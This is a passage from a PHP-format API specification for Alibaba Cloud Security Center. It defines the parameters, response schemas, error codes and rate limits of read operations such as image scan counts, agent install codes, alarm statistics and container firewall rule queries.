'云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetImageEventOperation', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'ImageEventOperation', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:imageeventoperation/{#ImageEventOperationId}'], ], ], ], ], ], 'GetImageScanNumInPeriod' => [ 'summary' => 'Queries the number of image scans that are performed within the last several days.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'PastDay', 'in' => 'query', 'schema' => ['description' => 'The number of days.'."\n", 'type' => 'string', 'required' => true, 'example' => '7', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '7E0618A9-D5EF-4220-9471-C42B5E92****', 'title' => ''], 'ImageScanData' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'ImageScanCount' => ['description' => 'The number of image scans.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '150', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42B5E92****\\",\\n \\"ImageScanData\\": {\\n \\"ImageScanCount\\": 150\\n }\\n}","type":"json"}]', 'title' => 'GetImageScanNumInPeriod', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetImageScanNumInPeriod'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetImageScanNumInPeriod', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetInstallCodeForUuid' => [ 'summary' => 'Queries the Security Center agent installation code for a specified asset by UUID.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '137420', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server whose agent installation code you want to query.'."\n" ."\n" .'> Call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => 'eae0b46e-2155-422e-9565-ecc52c69****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '7532B7EE-7CE7-5F4D-BF04-B12447DDCAE1', 'title' => ''], 'Code' => ['description' => 'The status code of the operation.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The response message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int64', 'example' => '200', 'title' => ''], 'InstallCode' => [ 'description' => 'The agent installation code.', 'type' => 'object', 'properties' => [ 'CaptchaCode' => ['description' => 'The verification code for manually installing the Security Center agent.', 'type' => 'string', 'example' => 'AK1W**', 'title' => ''], 'ExpiredDate' => ['description' => 'The expiration date of the verification code. The value is a 13-digit UNIX timestamp.'."\n" .'> The verification code can only be used within the validity period. An expired verification code cannot be used.', 'type' => 'integer', 'format' => 'int64', 'example' => '1723860871689', 'title' => ''], 'GroupId' => ['description' => 'The server group ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '342710', 'title' => ''], 'GroupName' => ['description' => 'The server group name.', 'type' => 'string', 'example' => 'TestGroup', 'title' => ''], 'Os' => ['description' => 'The operating system of the server. Valid values:'."\n" ."\n" .'- **linux**: Linux'."\n" ."\n" .'- **windows**: Windows.', 'type' => 'string', 'example' => 'linux', 'title' => ''], 'VendorName' => ['description' => 'The name of the server vendor.', 'type' => 'string', 'example' => 'ALIYUN', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the query was successful. Valid values:'."\n" .'- **true**: Successful.'."\n" .'- **false**: Failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParameter', 'errorMessage' => 'Illegal parameter, please check the param.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query the agent installation code for a specified asset by UUID', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetInstallCodeForUuid'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetInstallCodeForUuid', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7532B7EE-7CE7-5F4D-BF04-B12447DDCAE1\\",\\n \\"Code\\": 200,\\n \\"Message\\": \\"successful\\",\\n \\"HttpStatusCode\\": 200,\\n \\"InstallCode\\": {\\n \\"CaptchaCode\\": \\"AK1W**\\",\\n \\"ExpiredDate\\": 1723860871689,\\n \\"GroupId\\": 342710,\\n \\"GroupName\\": \\"TestGroup\\",\\n \\"Os\\": \\"linux\\",\\n \\"VendorName\\": \\"ALIYUN\\"\\n },\\n \\"Success\\": true\\n}","type":"json"}]', ], 'GetInstanceAlarmStatistics' => [ 'summary' => 'Count the number of security events for a single instance', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free'], 'parameters' => [ [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The data source for statistics on instance alarms, with a default value of aqs:'."\n" .'- *sas*: Situation Awareness data source'."\n" .'- *aqs*: Alarm event data'."\n" .'- *honeypot*: Honeypot', 'type' => 'string', 'required' => false, 'example' => 'sas', 'default' => 'aqs', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server to be queried.'."\n" .'> Call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) API to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '00fea5a1-9792-4373-ab1e-bb6536ba****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The returned message body.', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'Data structure.', 'type' => 'object', 'properties' => [ 'RemindCount' => ['description' => 'Reminder alarm count.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'SuspiciousCount' => ['description' => 'Suspicious alarm count.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'SeriousCount' => ['description' => 'Critical alarm count.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The unique identifier generated by Alibaba Cloud for this request.', 'type' => 'string', 'example' => '09969D2C-4FAD-429E-BFBF-9A60DEF8B****'."\n", 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'UnknownError', 'errorMessage' => 'UnknownError', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"RemindCount\\": 1,\\n \\"SuspiciousCount\\": 3,\\n \\"SeriousCount\\": 1\\n },\\n \\"RequestId\\": \\"09969D2C-4FAD-429E-BFBF-9A60DEF8B****\\\\n\\"\\n}","type":"json"}]', 'title' => 'Get Server Alarm Statistics', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '15', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetInstanceAlarmStatistics'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetInstanceAlarmStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetInstanceAuthRange' => [ 'summary' => 'Get Instance Authorization Value Range', 'path' => '', 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasFVYNUW'], 'autoTest' => true, 'tenantRelevance' => 'publicInformation', ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Structure.', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The ID of the current call request, which is a unique identifier generated by Alibaba Cloud for this request and can be used to troubleshoot and locate issues.', 'type' => 'string', 'example' => 'F8B6F758-BCD4-597A-8A2C-DA5A552C****'."\n"], 'InstanceAuthRange' => [ 'description' => 'Instance range validation', 'type' => 'object', 'properties' => [ 'AntiRansomwareService' => ['description' => 'Anti-ransomware service. Values:'."\n" ."\n" .'- **0**: Not enabled'."\n" ."\n" .'- **1**: Enabled', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AntiVirusCore' => ['description' => 'Anti-virus core count. Values:'."\n" ."\n" .'- **1-2000000000**: Range'."\n" ."\n" .'- **1**: Step', 'type' => 'string', 'example' => '1-2000000000:1', 'title' => ''], 'AdvancedCount' => ['description' => 'Advanced version count. Values:'."\n" ."\n" .'- **1-2000000000**: Range'."\n" ."\n" .'- **1**: Step', 'type' => 'string', 'example' => '1-2000000000:1', 'title' => ''], 'EnterpriseCount' => ['description' => 'Enterprise version count. Range:'."\n" ."\n" .'- **Value**: 1-2000000000'."\n" ."\n" .'- **Step**: 1', 'type' => 'string', 'example' => '1-2000000000:1', 'title' => ''], 'ContainerCount' => ['description' => 'Flagship version count. Values:'."\n" ."\n" .'- **1-2000000000**: Range'."\n" ."\n" .'- **1**: Step', 'type' => 'string', 'example' => '1-2000000000:1', 'title' => ''], 'ContainerCore' => ['description' => 'Flagship version core count. Values:'."\n" ."\n" .'- **1-2000000000**: Range'."\n" ."\n" .'- **1**: Step', 'type' => 'string', 'example' => '1-2000000000:1', 'title' => ''], 'RaspCapacity' => ['description' => 'Application protection count. Values:'."\n" ."\n" .'- **1-100000000**: Range'."\n" ."\n" .'- **1**: Step', 'type' => 'string', 'example' => '0-100000000:1', 'title' => ''], 'WebLockCapacity' => ['description' => 'Web tamper-proof authorization count. Values:'."\n" ."\n" .'- **1-9999**: Range'."\n" ."\n" .'- **1**: Step', 'type' => 'string', 'example' => '0-9999:1', 'title' => ''], 'ThreatAnalysisCapacity' => ['description' => 'Threat analysis capacity. Values:'."\n" ."\n" .'- **1-9999999999**: Range'."\n" ."\n" .'- **1000**: Step', 'type' => 'string', 'example' => '0-9999999999:1000', 'title' => ''], 'ThreatAnalysisFlow' => ['description' => 'Threat analysis and response log access traffic. Values:'."\n" ."\n" .'- **1-9999999999**: Range'."\n" ."\n" .'- **100**: Step', 'type' => 'string', 'example' => '0-9999999999:100', 'title' => ''], 'SlsCapacity' => ['description' => 'Log storage capacity. Values:'."\n" ."\n" .'- **1-600000000**: Range'."\n" ."\n" .'- **10**: Step', 'type' => 'string', 'example' => '0-600000000:10', 'title' => ''], 'AntiRansomwareCapacity' => ['description' => 'Anti-ransomware capacity. Values:'."\n" ."\n" .'- **1-9000000000**: Range'."\n" ."\n" .'- **10**: Step', 'type' => 'string', 'example' => '0-9000000000:10', 'title' => ''], 'ImageScanCapacity' => ['description' => 'Image scan authorization count. Values:'."\n" ."\n" .'- **1-200000**: Range'."\n" ."\n" .'- **20**: Step', 'type' => 'string', 'example' => '0-200000:20', 'title' => ''], 'HoneypotCapacity' => ['description' => 'Number of authorized honeypots. Value:'."\n" ."\n" .'- **20-500**:Range'."\n" ."\n" .'- **1**:Step', 'type' => 'string', 'example' => '20-500:1', 'title' => ''], 'CspmCapacity' => ['description' => 'Number of cloud platform configuration check scans. Value:'."\n" ."\n" .'- **15000-9999999999**:Range'."\n" ."\n" .'- **55000**:Step', 'type' => 'string', 'example' => '15000-9999999999:55000', 'title' => ''], 'SdkCapacity' => ['description' => 'Number of authorized malicious file detection SDKs. Value:'."\n" ."\n" .'- **10-9999999999**:Range'."\n" ."\n" .'- **10**:Step', 'type' => 'string', 'example' => '10-9999999999:10', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F8B6F758-BCD4-597A-8A2C-DA5A552C****\\\\n\\",\\n \\"InstanceAuthRange\\": {\\n \\"AntiRansomwareService\\": 1,\\n \\"AntiVirusCore\\": \\"1-2000000000:1\\",\\n \\"AdvancedCount\\": \\"1-2000000000:1\\",\\n \\"EnterpriseCount\\": \\"1-2000000000:1\\",\\n \\"ContainerCount\\": \\"1-2000000000:1\\",\\n \\"ContainerCore\\": \\"1-2000000000:1\\",\\n \\"RaspCapacity\\": \\"0-100000000:1\\",\\n \\"WebLockCapacity\\": \\"0-9999:1\\",\\n \\"ThreatAnalysisCapacity\\": \\"0-9999999999:1000\\",\\n \\"ThreatAnalysisFlow\\": \\"0-9999999999:100\\",\\n \\"SlsCapacity\\": \\"0-600000000:10\\",\\n \\"AntiRansomwareCapacity\\": \\"0-9000000000:10\\",\\n \\"ImageScanCapacity\\": \\"0-200000:20\\",\\n \\"HoneypotCapacity\\": \\"20-500:1\\",\\n \\"CspmCapacity\\": \\"15000-9999999999:55000\\",\\n \\"SdkCapacity\\": \\"10-9999999999:10\\"\\n }\\n}","type":"json"}]', 'title' => 'Get Instance Authorization Value Range', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetInstanceAuthRange'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetInstanceAuthRange', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetInterceptionRuleDetail' => [ 'summary' => 'Retrieves the details of a microsegmentation defense rule.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container cluster.'."\n" ."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to query the IDs of container clusters.', 'type' => 'string', 'required' => true, 'example' => 'c7f60fdabc84xxx', 'title' => ''], ], [ 'name' => 'RuleId', 'in' => 'query', 'schema' => ['description' => 'The ID of the rule.'."\n" ."\n" .'> You can call the [ListInterceptionRulePage](~~ListInterceptionRulePage~~) operation to query the IDs of rules.', 'type' => 'string', 'required' => true, 'example' => '500002', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '9FBC6E47-7508-xxx', 'title' => ''], 'InterceptionRuleDetail' => [ 'description' => 'The details of the rule.', 'type' => 'object', 'properties' => [ 'RuleType' => [ 'description' => 'The type of the rule. Valid values:'."\n" ."\n" .'- **suggest**: a suggestion rule'."\n" ."\n" .'- **customize**: a custom rule', 'enumValueTitles' => ['suggest' => 'suggest', 'customize' => 'customize'], 'type' => 'string', 'example' => 'customize', 'title' => '', ], 'RuleSwitch' => [ 'description' => 'The status of the defense rule. Valid values:'."\n" ."\n" .'- **1**: The rule is enabled.'."\n" ."\n" .'- **0**: The rule is disabled.', 'enumValueTitles' => ['0', '1'], 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => '', ], 'RuleId' => ['description' => 'The ID of the rule.', 'type' => 'integer', 'format' => 'int64', 'example' => '467', 'title' => ''], 'RuleName' => ['description' => 'The name of the rule.', 'type' => 'string', 'example' => 'dmz-frontend-accept', 'title' => ''], 'SrcTarget' => [ 'description' => 'The source network object.', 'type' => 'object', 'properties' => [ 'AppName' => ['description' => 'The name of the application.', 'type' => 'string', 'example' => 'console', 'title' => ''], 'RuleType' => ['description' => 'The type of the rule.', 'type' => 'string', 'example' => 'customize', 'title' => ''], 'TargetId' => ['description' => 'The ID of the network object.', 'type' => 'integer', 'format' => 'int32', 'example' => '300635', 'title' => ''], 'TargetName' => ['description' => 'The name of the object.', 'type' => 'string', 'example' => 'dmz', 'title' => ''], 'Namespace' => ['description' => 'The namespace to which the network object belongs.', 'type' => 'string', 'example' => 'default', 'title' => ''], 'TargetType' => ['description' => 'The type of the network object.', 'type' => 'string', 'example' => 'IMAGE', 'title' => ''], 'ImageList' => [ 'description' => 'The images of the network object.', 'type' => 'array', 'items' => ['description' => 'An array that consists of images.', 'type' => 'string', 'example' => 'arms-prom-operator:v0.1', 'title' => ''], 'title' => '', 'example' => '', ], 'TagList' => [ 'description' => 'The labels specified for the network object.', 'type' => 'array', 'items' => ['description' => 'The labels specified for the network object.', 'type' => 'string', 'example' => 'service:be-v1', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'DstTarget' => [ 'description' => 'The destination network object.', 'type' => 'object', 'properties' => [ 'AppName' => ['description' => 'The name of the application.', 'type' => 'string', 'example' => 'console', 'title' => ''], 'RuleType' => ['description' => 'The type of the rule.', 'type' => 'string', 'example' => 'customize', 'title' => ''], 'TargetId' => ['description' => 'The ID of the network object.', 'type' => 'integer', 'format' => 'int32', 'example' => '200014', 'title' => ''], 'TargetName' => ['description' => 'The name of the object.', 'type' => 'string', 'example' => 'demo4-be1', 'title' => ''], 'Namespace' => ['description' => 'The namespace to which the network object belongs.', 'type' => 'string', 'example' => 'kube-system', 'title' => ''], 'TargetType' => ['description' => 'The type of the network object.', 'type' => 'string', 'example' => 'IMAGE', 'title' => ''], 'Ports' => [ 'description' => 'An array that consists of the port range of the destination network object.', 'type' => 'array', 'items' => ['description' => 'The port range of the destination network object.', 'type' => 'string', 'example' => '80/8080', 'title' => ''], 'title' => '', 'example' => '', ], 'ImageList' => [ 'description' => 'An array that consists of the name of the image specified for the network object.', 'type' => 'array', 'items' => ['description' => 'The name of the image specified for the network object.', 'type' => 'string', 'example' => 'bj_storage:nginx1', 'title' => ''], 'title' => '', 'example' => '', ], 'TagList' => [ 'description' => 'An array that consists of the labels specified for the network object.', 'type' => 'array', 'items' => ['description' => 'The labels specified for the network object.', 'type' => 'string', 'example' => 'chart:ack-arms-prometheus-1.1.0', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'InterceptType' => ['description' => 'The interception mode. Valid values:'."\n" ."\n" .'- **0**: monitor'."\n" ."\n" .'- **1**: block'."\n" ."\n" .'- **2**: alert'."\n" ."\n" .'- **3**: allow', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], 'OrderIndex' => ['description' => 'The priority of the rule. Valid values: 1 to 1000. A smaller value indicates a higher priority.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"9FBC6E47-7508-xxx\\",\\n \\"InterceptionRuleDetail\\": {\\n \\"RuleType\\": \\"customize\\",\\n \\"RuleSwitch\\": 1,\\n \\"RuleId\\": 467,\\n \\"RuleName\\": \\"dmz-frontend-accept\\",\\n \\"SrcTarget\\": {\\n \\"AppName\\": \\"console\\",\\n \\"RuleType\\": \\"customize\\",\\n \\"TargetId\\": 300635,\\n \\"TargetName\\": \\"dmz\\",\\n \\"Namespace\\": \\"default\\",\\n \\"TargetType\\": \\"IMAGE\\",\\n \\"ImageList\\": [\\n \\"arms-prom-operator:v0.1\\"\\n ],\\n \\"TagList\\": [\\n \\"service:be-v1\\"\\n ]\\n },\\n \\"DstTarget\\": {\\n \\"AppName\\": \\"console\\",\\n \\"RuleType\\": \\"customize\\",\\n \\"TargetId\\": 200014,\\n \\"TargetName\\": \\"demo4-be1\\",\\n \\"Namespace\\": \\"kube-system\\",\\n \\"TargetType\\": \\"IMAGE\\",\\n \\"Ports\\": [\\n \\"80/8080\\"\\n ],\\n \\"ImageList\\": [\\n \\"bj_storage:nginx1\\"\\n ],\\n \\"TagList\\": [\\n \\"chart:ack-arms-prometheus-1.1.0\\"\\n ]\\n },\\n \\"InterceptType\\": 1,\\n \\"OrderIndex\\": 1\\n }\\n}","type":"json"}]', 'title' => 'GetInterceptionRuleDetail', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetInterceptionRuleDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetInterceptionRuleDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetInterceptionSummary' => [ 'summary' => 'Queries the statistics of the container firewall feature.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the cluster.'."\n" ."\n" .'> You can call the [DescribeGroupedContainerInstances](~~421736~~) operation to query the IDs of clusters.', 'type' => 'string', 'required' => false, 'example' => 'c2999***bb61b', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.', 'type' => 'string', 'example' => 'F35F45B0-5D6B-4238-BE02-A62D0760E840', 'title' => ''], 'InterceptionSummary' => [ 'description' => 'The statistics.', 'type' => 'object', 'properties' => [ 'CloseClusterCount' => ['description' => 'The number of clusters that are not protected.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'RiskCount30Day' => ['description' => 'The number of security risks that are detected in the last 30 days.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'RiskCount180Day' => ['description' => 'The number of security risks that are detected in the last 180 days.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'OpenClusterCount' => ['description' => 'The number of clusters that are protected.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'RiskCountToday' => ['description' => 'The number of security risks that are detected in the last 24 hours.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'CloseRuleCount' => ['description' => 'The number of disabled cluster defense rules.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'RuleCount' => ['description' => 'The total number of cluster defense rules.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'ClusterCount' => ['description' => 'The total number of clusters.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'OpenRuleCount' => ['description' => 'The number of enabled cluster defense rules.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'InterceptionCountInDays' => ['description' => 'The total number of interception records for the specified cluster.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F35F45B0-5D6B-4238-BE02-A62D0760E840\\",\\n \\"InterceptionSummary\\": {\\n \\"CloseClusterCount\\": 0,\\n \\"RiskCount30Day\\": 0,\\n \\"RiskCount180Day\\": 0,\\n \\"OpenClusterCount\\": 0,\\n \\"RiskCountToday\\": 0,\\n \\"CloseRuleCount\\": 0,\\n \\"RuleCount\\": 0,\\n \\"ClusterCount\\": 0,\\n \\"OpenRuleCount\\": 0,\\n \\"InterceptionCountInDays\\": 0\\n }\\n}","type":"json"}]', 'title' => 'GetInterceptionSummary', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetInterceptionSummary'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetInterceptionSummary', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetInterceptionTargetDetail' => [ 'summary' => 'Queries the information about a specified network object that is protected by the container firewall feature.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'TargetId', 'in' => 'query', 'schema' => ['description' => 'The ID of the network object.'."\n" ."\n" .'> You can call the [ListInterceptionTargetPage](~~ListInterceptionTargetPage~~) operation to query the IDs of network objects.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '402008', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'D65AADFC-1D20-5A6A-8F6A-9FA53C0DC1F8', 'title' => ''], 'RuleTarget' => [ 'description' => 'The information about the network object.'."\n", 'type' => 'object', 'properties' => [ 'AppName' => ['description' => 'The name of the application to which the network object belongs.'."\n", 'type' => 'string', 'example' => 'netperf-client', 'title' => ''], 'ImageList' => [ 'description' => 'An array that consists of the images of the network object.'."\n", 'type' => 'array', 'items' => ['description' => 'The information about the image.'."\n", 'type' => 'string', 'example' => 'nginx:latest', 'title' => ''], 'title' => '', 'example' => '', ], 'TagList' => [ 'description' => 'An array that consists of the labels specified for the network object.'."\n", 'type' => 'array', 'items' => ['description' => 'The information about the label.'."\n", 'type' => 'string', 'example' => 'service:be-v1', 'title' => ''], 'title' => '', 'example' => '', ], 'TargetId' => ['description' => 'The ID of the network object.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '400723', 'title' => ''], 'TargetName' => ['description' => 'The name of the network object.'."\n", 'type' => 'string', 'example' => 'destination-test-obj-Na3cF', 'title' => ''], 'Namespace' => ['description' => 'The namespace.'."\n", 'type' => 'string', 'example' => 'secondary', 'title' => ''], 'TargetType' => ['description' => 'The type of the network object. Valid values:'."\n" ."\n" .'* **IMAGE**: image'."\n", 'type' => 'string', 'example' => 'IMAGE', 'title' => ''], 'ClusterName' => ['description' => 'The name of the container cluster.'."\n", 'type' => 'string', 'example' => 'sas-test-cnnf'."\n", 'title' => ''], 'ClusterId' => ['description' => 'The ID of the container cluster.'."\n", 'type' => 'string', 'example' => 'ca6e6594def8d4be8b2795fd12c32****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 